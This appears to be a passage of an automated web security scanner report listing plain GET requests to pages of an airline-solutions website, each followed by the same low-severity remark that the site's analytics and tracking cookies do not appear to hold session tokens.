GET /home/ascend/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321370; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/archive HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321532; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/archive/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321342; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/contact HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321540; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/contact/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321376; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/current_issue HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321374; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/current_issue/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321334; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/error HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend/error/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/error/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/includes/ascend_confirm.php Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/past_editions HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321543; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/past_editions/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321341; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/subscribe HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321377; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/ascend/subscribe/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321333; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A1%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321554; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/fuel_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321561; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/fuel_management/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/irregular_operations/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322256; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/other_airline_issues HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321529; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/other_airline_issues/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/revenue_growth HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/business_issues/revenue_growth/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321409; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/airline_distribution HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321476; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/contact/airline_distribution/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321432; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
